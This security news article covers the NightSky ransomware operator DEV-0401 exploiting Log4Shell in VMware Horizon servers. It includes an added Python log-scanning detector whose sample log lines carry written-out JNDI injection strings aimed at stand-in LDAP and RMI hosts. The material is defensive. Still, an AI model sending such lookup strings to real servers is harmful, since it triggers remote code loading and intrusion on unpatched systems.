IOTW: VMware Horizon targeted by attackers exploiting Log4j

New ransomware leveraging the Log4j vulnerability identified in VMware Horizon servers


The Log4j vulnerability continues to be exploited by threat actors and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in the VMware Horizon servers.

According to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells that can then be used to deploy malicious software, exfiltrate data and deploy ransomware. VMware Horizon is a virtual desktop product that leverages the hybrid cloud.

On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”.

“Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said.

NightSky ransomware

The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam.

The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401.

“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).”

Based on Microsoft’s analysis, the attackers are using command-and-control (CnC) servers that spoof legitimate domains.

The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”.
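The lookup described in the NHS statement, a JNDI string that points at an attacker-controlled LDAP or RMI endpoint, has to pass through a logged field (request path, User-Agent, Referer) before Log4j evaluates it, so it leaves a trace in web and gateway logs. The following detector is an added example, not code from the article, the NHS or Microsoft; the log lines and the hosts 203.0.113.10 and c2.example are constructed samples.

```python
import re
from urllib.parse import unquote

# A Log4j lookup of the form ${jndi:<scheme>://<host>[:port]/...}. Matched case-insensitively
# after percent-decoding, since the string may arrive inside a URL rather than a header.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?",
    re.I,
)

# Schemes that cause the JVM to fetch and load a remote class (the web-shell path in the article);
# anything else (e.g. dns) is still worth flagging as a probe but carries lower severity.
REMOTE_LOAD = {"ldap", "ldaps", "rmi", "iiop", "corba", "nds"}

# Constructed sample access-log lines (not from the article). Line 2 carries the lookup in the
# User-Agent field, line 3 carries it percent-encoded in the request path.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jan/2022:10:03:14 +0000] "GET /portal/info.jsp HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"
198.51.100.7 - - [05/Jan/2022:10:03:20 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2Fc2.example%2Fx HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""


def find_jndi_lookups(line: str):
    """Return (scheme, host, port) for every JNDI lookup found in one log line."""
    decoded = unquote(unquote(line))  # undo single or double percent-encoding
    return [
        (m.group("scheme").lower(), m.group("host"), int(m.group("port")) if m.group("port") else None)
        for m in JNDI_RE.finditer(decoded)
    ]


def scan_log(text: str):
    """Return one finding per lookup: source IP, endpoint details and a severity label."""
    findings = []
    for line in text.splitlines():
        src = line.split(" ", 1)[0]  # first token of a combined-format line is the client IP
        for scheme, host, port in find_jndi_lookups(line):
            severity = "high" if scheme in REMOTE_LOAD else "medium"
            findings.append({"src": src, "scheme": scheme, "host": host, "port": port, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['src']} -> {f['scheme']}://{f['host']}:{f['port']}")
```

Hosts surfaced this way are candidates for blocking at the egress firewall and for correlation with outbound LDAP/RMI connections from the Horizon host, which is the point at which the malicious class would actually be fetched.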

Log4j impact continues

Since the Log4j vulnerability was uncovered in early December 2021, threat actors have taken advantage of the opportunities it presents.

According to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability.

Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability.

In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted. Ransomware groups may look to use Log4Shell as a method of illicit entry into organizations. Once access is secured, threat actors will then look to obtain further access in order to be able to ransom the whole organization in a highly impactful way.”
